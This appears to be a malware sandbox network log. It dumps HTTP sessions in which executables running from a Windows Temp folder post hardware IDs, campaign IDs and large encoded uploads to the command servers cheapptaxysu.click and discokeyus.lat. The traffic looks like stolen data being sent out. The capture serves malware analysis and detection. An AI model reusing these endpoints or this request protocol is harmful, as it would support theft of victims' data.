                                                                                                                                                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1604&min_rtt=1597&rtt_var=604&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2832&recv_bytes=2319&delivery_rate=1828428&cwnd=225&unsent_bytes=0&cid=10710c00fb00e2f5&ts=1004&x=0"
                                                                                                                                                                                                                                                            2024-12-21 21:18:07 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: fok 8.46.123.189
                                                                                                                                                                                                                                                            2024-12-21 21:18:07 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: 0


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            53192.168.2.449949104.21.67.146443692C:\Users\user\AppData\Local\Temp\1019675001\74b92d58dc.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            2024-12-21 21:18:08 UTC364OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                                            Content-Type: multipart/form-data; boundary=E69GNT2B3
                                                                                                                                                                                                                                                            Cookie: __cf_mw_byp=UK5f.kGqs4s6b_2zbAsIvGYwo4.3VSBZmtv09cMrxTk-1734815877-0.0.1.1-/api
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                            Content-Length: 18112
                                                                                                                                                                                                                                                            Host: cheapptaxysu.click
                                                                                                                                                                                                                                                            2024-12-21 21:18:08 UTC15331OUTData Raw: 2d 2d 45 36 39 47 4e 54 32 42 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 41 43 42 46 37 41 44 32 31 46 43 39 39 30 44 34 41 43 38 39 32 33 38 35 30 33 30 35 44 31 33 45 0d 0a 2d 2d 45 36 39 47 4e 54 32 42 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 45 36 39 47 4e 54 32 42 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 43 5a 4a 76 73 73 2d 2d 67 65 6f 70 6f 78 69 64 0d 0a 2d 2d 45 36 39 47 4e 54 32 42 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44
                                                                                                                                                                                                                                                            Data Ascii: --E69GNT2B3Content-Disposition: form-data; name="hwid"ACBF7AD21FC990D4AC8923850305D13E--E69GNT2B3Content-Disposition: form-data; name="pid"2--E69GNT2B3Content-Disposition: form-data; name="lid"CZJvss--geopoxid--E69GNT2B3Content-D
                                                                                                                                                                                                                                                            2024-12-21 21:18:08 UTC2781OUTData Raw: 2e a7 07 cf 5c b7 ad 66 f0 cc 99 a8 33 f7 13 05 cf ec 85 7a 3b 85 8d 54 32 2f 1f e5 1b c1 33 7b 37 a5 bf 9f 8e 3a f1 6e 9a e0 79 69 60 c1 4c a6 f2 f7 de 4b 1f 36 af 1d f9 d7 e0 58 6d 5b 0b fd 9c 0a b5 9b 60 cc b0 d7 ab 1f 3b d0 52 0a 9f fd 54 22 95 3f 7a 94 ff 75 ab 9f a1 e3 6f 93 83 99 38 43 4e 2f 95 2f 6d 6e ac ae d3 03 1e ad ac 6f 7a a3 8a 81 36 d9 bf 1f 83 71 fd 1a ed c5 4d d3 3e 9b d8 ac 97 0c bd 15 36 2b 97 37 bb ef 2e 57 0f bc 3e 57 2a 0f 97 2f ad 6d 4a a7 02 2f 2b 7f 42 10 78 3e ba 45 a8 b5 6d 75 bf 83 75 53 b3 09 3b 9c 3e 27 56 d3 d4 ab d6 33 5e 4f 4d 1f 4e cd b2 89 b4 bc b1 b1 56 29 af ef 1e fa 70 79 ed 62 65 cf 7b d9 de 73 45 81 36 af a9 da 16 51 bc 21 8f 77 45 11 8f 43 d4 61 11 d5 14 88 8d cc 54 77 94 6d 93 be 93 15 d7 52 9c ab a6 b6 5f c9 35
                                                                                                                                                                                                                                                            Data Ascii: .\f3z;T2/3{7:nyi`LK6Xm[`;RT"?zuo8CN//mnoz6qM>6+7.W>W*/mJ/+Bx>EmuuS;>'V3^OMNV)pybe{sE6Q!wECaTwmR_5
                                                                                                                                                                                                                                                            2024-12-21 21:18:09 UTC1130INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                            Date: Sat, 21 Dec 2024 21:18:09 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            Set-Cookie: PHPSESSID=669mpfi1luoqadcjkugug5lmh7; expires=Wed, 16 Apr 2025 15:04:47 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                                                                                                            X-Frame-Options: DENY
                                                                                                                                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                            X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                            cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                            vary: accept-encoding
                                                                                                                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=NAn9wkrvNG7R3Zsuii8zPjZ5ocT9GQmInBTvIOUH2L8tskcyBZfXIE77XPTk51Su2CfATY0WEjYoU3oTWgBqiBkQ9oCFlgx%2Fj5TN2nuMYop6pHte%2FEvVa2quod1lxCBpzwhqLOI%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                                            CF-RAY: 8f5ae7268da1de9a-EWR
                                                                                                                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1475&min_rtt=1471&rtt_var=561&sent=13&recv=21&lost=0&retrans=0&sent_bytes=2844&recv_bytes=19156&delivery_rate=1933774&cwnd=209&unsent_bytes=0&cid=e1a7b4f84f10159b&ts=1095&x=0"
                                                                                                                                                                                                                                                            2024-12-21 21:18:09 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: fok 8.46.123.189
                                                                                                                                                                                                                                                            2024-12-21 21:18:09 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: 0


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            54192.168.2.449953104.21.21.99443944C:\Users\user\AppData\Local\Temp\1019670001\ed7d415177.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            2024-12-21 21:18:10 UTC262OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                            Content-Length: 82
                                                                                                                                                                                                                                                            Host: discokeyus.lat
                                                                                                                                                                                                                                                            2024-12-21 21:18:10 UTC82OUTData Raw: 61 63 74 3d 67 65 74 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 50 73 46 4b 44 67 2d 2d 70 61 62 6c 6f 26 6a 3d 26 68 77 69 64 3d 41 43 42 46 37 41 44 32 31 46 43 39 39 30 44 34 41 43 38 39 32 33 38 35 30 33 30 35 44 31 33 45
                                                                                                                                                                                                                                                            Data Ascii: act=get_message&ver=4.0&lid=PsFKDg--pablo&j=&hwid=ACBF7AD21FC990D4AC8923850305D13E
                                                                                                                                                                                                                                                            2024-12-21 21:18:11 UTC1121INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                            Date: Sat, 21 Dec 2024 21:18:11 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            Set-Cookie: PHPSESSID=t4e7pkueq1br5jscqf49nk1ued; expires=Wed, 16 Apr 2025 15:04:50 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                                                                                                            X-Frame-Options: DENY
                                                                                                                                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                            X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                            cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                            vary: accept-encoding
                                                                                                                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2BquMh3aK3OjlrS2Wc49gAL0BR9cSncVE6MVra8vUC5Gm0RAU2tnlqOLrK0EUj1TjUPcnPpz51ATvcUcrfIVJr4qyzbLYsW3E15SrksSXaZPJXGKBaPsy0Xo7iUlhmgQUQQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                                            CF-RAY: 8f5ae737ee0919c3-EWR
                                                                                                                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1823&min_rtt=1815&rtt_var=697&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2832&recv_bytes=980&delivery_rate=1550716&cwnd=148&unsent_bytes=0&cid=d28fbf2ed69099a8&ts=785&x=0"
                                                                                                                                                                                                                                                            2024-12-21 21:18:11 UTC214INData Raw: 64 30 0d 0a 72 6c 65 66 65 69 30 5a 5a 6e 74 5a 59 62 64 6a 42 66 47 51 37 66 50 4b 6f 6d 41 46 35 62 39 77 61 45 30 4f 6d 4f 69 65 49 71 54 31 4c 4c 30 50 44 79 4e 45 45 79 30 56 78 31 6c 5a 33 73 7a 43 77 76 4b 58 54 6a 66 55 69 6c 35 5a 66 44 32 32 32 61 68 2b 69 38 45 78 2b 53 59 43 66 51 4d 64 64 77 54 50 42 69 66 64 73 6f 75 48 36 4a 68 51 4b 63 66 61 55 6c 4a 39 63 37 53 54 76 46 65 47 6c 48 58 33 44 6c 6c 70 58 43 64 32 50 5a 68 53 50 63 53 2b 33 38 4c 2f 6a 46 45 30 31 70 46 42 58 68 45 68 36 35 7a 37 51 38 6e 79 65 4f 30 62 51 33 30 4a 46 6e 63 45 7a 77 59 6e 33 62 4b 4c 68 2b 69 59 55 43 6e 48 32 6c 4a 53 66 58 50 46 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: d0rlefei0ZZntZYbdjBfGQ7fPKomAF5b9waE0OmOieIqT1LL0PDyNEEy0Vx1lZ3szCwvKXTjfUil5ZfD222ah+i8Ex+SYCfQMddwTPBifdsouH6JhQKcfaUlJ9c7STvFeGlHX3DllpXCd2PZhSPcS+38L/jFE01pFBXhEh65z7Q8nyeO0bQ30JFncEzwYn3bKLh+iYUCnH2lJSfXPF
                                                                                                                                                                                                                                                            2024-12-21 21:18:11 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: 0


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                            55192.168.2.449954104.21.21.99443
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            2024-12-21 21:18:11 UTC270OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                                            Content-Type: multipart/form-data; boundary=3AV925D7
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                            Content-Length: 18103
                                                                                                                                                                                                                                                            Host: discokeyus.lat
                                                                                                                                                                                                                                                            2024-12-21 21:18:11 UTC15331OUTData Raw: 2d 2d 33 41 56 39 32 35 44 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 41 43 42 46 37 41 44 32 31 46 43 39 39 30 44 34 41 43 38 39 32 33 38 35 30 33 30 35 44 31 33 45 0d 0a 2d 2d 33 41 56 39 32 35 44 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 33 41 56 39 32 35 44 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 50 73 46 4b 44 67 2d 2d 70 61 62 6c 6f 0d 0a 2d 2d 33 41 56 39 32 35 44 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74
                                                                                                                                                                                                                                                            Data Ascii: --3AV925D7Content-Disposition: form-data; name="hwid"ACBF7AD21FC990D4AC8923850305D13E--3AV925D7Content-Disposition: form-data; name="pid"2--3AV925D7Content-Disposition: form-data; name="lid"PsFKDg--pablo--3AV925D7Content-Disposit
                                                                                                                                                                                                                                                            2024-12-21 21:18:11 UTC2772OUTData Raw: f0 cc 99 a8 33 f7 13 05 cf ec 85 7a 3b 85 8d 54 32 2f 1f e5 1b c1 33 7b 37 a5 bf 9f 8e 3a f1 6e 9a e0 79 69 60 c1 4c a6 f2 f7 de 4b 1f 36 af 1d f9 d7 e0 58 6d 5b 0b fd 9c 0a b5 9b 60 cc b0 d7 ab 1f 3b d0 52 0a 9f fd 54 22 95 3f 7a 94 ff 75 ab 9f a1 e3 6f 93 83 99 38 43 4e 2f 95 2f 6d 6e ac ae d3 03 1e ad ac 6f 7a a3 8a 81 36 d9 bf 1f 83 71 fd 1a ed c5 4d d3 3e 9b d8 ac 97 0c bd 15 36 2b 97 37 bb ef 2e 57 0f bc 3e 57 2a 0f 97 2f ad 6d 4a a7 02 2f 2b 7f 42 10 78 3e ba 45 a8 b5 6d 75 bf 83 75 53 b3 09 3b 9c 3e 27 56 d3 d4 ab d6 33 5e 4f 4d 1f 4e cd b2 89 b4 bc b1 b1 56 29 af ef 1e fa 70 79 ed 62 65 cf 7b d9 de 73 45 81 36 af a9 da 16 51 bc 21 8f 77 45 11 8f 43 d4 61 11 d5 14 88 8d cc 54 77 94 6d 93 be 93 15 d7 52 9c ab a6 b6 5f c9 35 8b 56 2d 7b 91 d7 e9 19
                                                                                                                                                                                                                                                            Data Ascii: 3z;T2/3{7:nyi`LK6Xm[`;RT"?zuo8CN//mnoz6qM>6+7.W>W*/mJ/+Bx>EmuuS;>'V3^OMNV)pybe{sE6Q!wECaTwmR_5V-{
                                                                                                                                                                                                                                                            2024-12-21 21:18:12 UTC1130INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                            Date: Sat, 21 Dec 2024 21:18:12 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            Set-Cookie: PHPSESSID=966dqom4f7793d3kqg555trvi1; expires=Wed, 16 Apr 2025 15:04:50 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                                                                                                            X-Frame-Options: DENY
                                                                                                                                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                            X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                            cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                            vary: accept-encoding
                                                                                                                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=6SWs4CwUmWg1YBBRVMTasEiWK4FGF5prSapYf%2BHwYFnTc0%2FdL4HAEOq9dl8IB1w2Hd0h2NuyADZnCiIRWyFGdrVFPwI1A8HGjLEulgwT8CiNWR%2BprXMe3t71JqqgTrEU6w%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                                            CF-RAY: 8f5ae7387bb142cd-EWR
                                                                                                                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1680&min_rtt=1677&rtt_var=635&sent=14&recv=24&lost=0&retrans=0&sent_bytes=2831&recv_bytes=19053&delivery_rate=1714621&cwnd=242&unsent_bytes=0&cid=74ed6717f00b35c2&ts=1220&x=0"
                                                                                                                                                                                                                                                            2024-12-21 21:18:12 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: fok 8.46.123.189
                                                                                                                                                                                                                                                            2024-12-21 21:18:12 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: 0


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            56192.168.2.449956104.21.67.146443692C:\Users\user\AppData\Local\Temp\1019675001\74b92d58dc.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            2024-12-21 21:18:12 UTC369OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                                            Content-Type: multipart/form-data; boundary=D7H5WRM56HGMCKF
                                                                                                                                                                                                                                                            Cookie: __cf_mw_byp=UK5f.kGqs4s6b_2zbAsIvGYwo4.3VSBZmtv09cMrxTk-1734815877-0.0.1.1-/api
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                            Content-Length: 8769
                                                                                                                                                                                                                                                            Host: cheapptaxysu.click
                                                                                                                                                                                                                                                            2024-12-21 21:18:12 UTC8769OUTData Raw: 2d 2d 44 37 48 35 57 52 4d 35 36 48 47 4d 43 4b 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 41 43 42 46 37 41 44 32 31 46 43 39 39 30 44 34 41 43 38 39 32 33 38 35 30 33 30 35 44 31 33 45 0d 0a 2d 2d 44 37 48 35 57 52 4d 35 36 48 47 4d 43 4b 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 44 37 48 35 57 52 4d 35 36 48 47 4d 43 4b 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 43 5a 4a 76 73 73 2d 2d 67 65 6f 70 6f 78 69 64 0d 0a 2d 2d 44 37
                                                                                                                                                                                                                                                            Data Ascii: --D7H5WRM56HGMCKFContent-Disposition: form-data; name="hwid"ACBF7AD21FC990D4AC8923850305D13E--D7H5WRM56HGMCKFContent-Disposition: form-data; name="pid"2--D7H5WRM56HGMCKFContent-Disposition: form-data; name="lid"CZJvss--geopoxid--D7
                                                                                                                                                                                                                                                            2024-12-21 21:18:12 UTC1132INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                            Date: Sat, 21 Dec 2024 21:18:12 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            Set-Cookie: PHPSESSID=b4cafminoacbhca6jvuoembrf1; expires=Wed, 16 Apr 2025 15:04:51 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                                                                                                            X-Frame-Options: DENY
                                                                                                                                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                            X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                            cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                            vary: accept-encoding
                                                                                                                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=7iQBnzN2UdwAI35O4%2BxPV8r%2FYXeoRfazaQUrbYSeb4dEGfuq7lA%2FlePK1%2FMDrSsNBZsb1XHRSuYkKSn2Bqg36sr66F3WEBFhiNGI1oOkyvtr6VaWxwdaEWQwUc4DhFWpAtLZleA%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                                            CF-RAY: 8f5ae73e18d9236a-EWR
                                                                                                                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=2058&min_rtt=1992&rtt_var=794&sent=10&recv=14&lost=0&retrans=0&sent_bytes=2843&recv_bytes=9796&delivery_rate=1465863&cwnd=170&unsent_bytes=0&cid=ee282a7988da1407&ts=809&x=0"
                                                                                                                                                                                                                                                            2024-12-21 21:18:12 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: fok 8.46.123.189
                                                                                                                                                                                                                                                            2024-12-21 21:18:12 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: 0


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            57192.168.2.449957104.21.21.99443280C:\Users\user\AppData\Local\Temp\1019670001\ed7d415177.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            2024-12-21 21:18:12 UTC275OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                                            Content-Type: multipart/form-data; boundary=4AQK086AUT2B
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                            Content-Length: 147198
                                                                                                                                                                                                                                                            Host: discokeyus.lat
                                                                                                                                                                                                                                                            2024-12-21 21:18:12 UTC15331OUTData Raw: 2d 2d 34 41 51 4b 30 38 36 41 55 54 32 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 41 43 42 46 37 41 44 32 31 46 43 39 39 30 44 34 41 43 38 39 32 33 38 35 30 33 30 35 44 31 33 45 0d 0a 2d 2d 34 41 51 4b 30 38 36 41 55 54 32 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 34 41 51 4b 30 38 36 41 55 54 32 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 50 73 46 4b 44 67 2d 2d 70 61 62 6c 6f 0d 0a 2d 2d 34 41 51 4b 30 38 36 41 55 54 32 42 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: --4AQK086AUT2BContent-Disposition: form-data; name="hwid"ACBF7AD21FC990D4AC8923850305D13E--4AQK086AUT2BContent-Disposition: form-data; name="pid"1--4AQK086AUT2BContent-Disposition: form-data; name="lid"PsFKDg--pablo--4AQK086AUT2B
                                                                                                                                                                                                                                                            2024-12-21 21:18:12 UTC15331OUTData Raw: 6c 85 78 2b 6a c1 81 85 95 c2 a8 f0 eb 71 9d 86 3a 2f 6e ba 72 33 a9 df 0b c3 23 65 5c 39 c0 9b 13 93 35 ef 93 e5 0e 1c 96 48 f1 d6 fa 13 f1 07 ed be 27 fe 49 cf 82 38 30 9f 04 86 df 7a f4 4e 9a 07 b6 cf 40 c2 9e 3a 2e 06 c8 3b 62 9a 23 d3 79 ef 39 74 6b 7e 6c 5c 21 e6 9d 7d 1d d5 64 fc 3a 3c 33 ad 4a 92 38 90 89 6f 5a 55 b8 4a 59 f9 5c a3 bf 3b 90 d1 e1 2a fe 6a 38 68 fa 29 c7 e9 1f df 26 5a 1f 5a c8 e9 61 55 c0 51 6f cc a7 0f 0e 4c 0e d4 b6 d4 72 b2 db 69 c9 ef 9f c9 96 16 dd 7f 31 59 6b 4d c3 20 ed 86 54 81 bc 9d 2c b7 c6 df 9e ac cd 8c 61 9c 20 ae 35 ad 1b 41 2f d1 42 bf 27 8b fb a3 d6 28 aa b5 fa 69 04 cc e1 1a c2 84 da 9f 08 07 c8 7a 69 61 79 ba 6c 39 07 e1 90 9c b2 b5 34 e7 f7 96 a1 46 7f 51 8c ad 62 b2 b3 e4 c0 47 df 8f f6 3f 9a 63 32 df 9e ab af
                                                                                                                                                                                                                                                            Data Ascii: lx+jq:/nr3#e\95H'I80zN@:.;b#y9tk~l\!}d:<3J8oZUJY\;*j8h)&ZZaUQoLri1YkM T,a 5A/B'(iziayl94FQbG?c2
                                                                                                                                                                                                                                                            2024-12-21 21:18:12 UTC15331OUTData Raw: 77 85 66 4f 84 91 fb af 2b ee 04 b9 fc 34 13 bf 5b aa 02 1d 8a f6 22 13 78 78 fe e6 6c 6d f0 64 28 3a 6b b0 10 85 a0 57 34 0b 38 63 27 a4 13 8d 52 89 66 54 a4 48 b8 43 37 2c 86 98 85 ee d5 52 d5 ff dc 50 5d c3 41 96 3e 6a a5 3e 8c 56 06 92 13 13 ad fc 52 8c a1 c4 73 74 17 ad 87 ff 55 32 76 9c 9a 2f 20 38 79 7b f6 9c 67 d8 03 0e e3 49 a4 6b 05 ef e0 2e 14 e6 38 72 4a 00 2b 66 4d e9 6b 10 f2 c4 27 5f 06 53 c0 4d 5d 71 25 fa 3b d2 aa ee e5 9e f3 53 9d 81 1d 3c e0 30 36 17 53 70 4d 84 9b ad da 8e 4b 62 67 c8 f2 29 13 33 6e c5 42 f8 c9 f5 99 95 d8 cc de a4 94 cf da 61 fc d1 a4 4d d6 70 61 56 c0 43 36 95 98 1c 5c 0a b2 e2 bd 6f 5f 80 2d 61 73 81 e3 ad 63 4a 69 54 8b fa ab dd 46 d4 d8 86 6a 18 71 08 0f 7e a4 a0 d2 f5 83 0d 4a f6 79 f1 f6 e4 b5 e1 03 29 ed b7 67
                                                                                                                                                                                                                                                            Data Ascii: wfO+4["xxlmd(:kW48c'RfTHC7,RP]A>j>VRstU2v/ 8y{gIk.8rJ+fMk'_SM]q%;S<06SpMKbg)3nBaMpaVC6\o_-ascJiTFjq~Jy)g
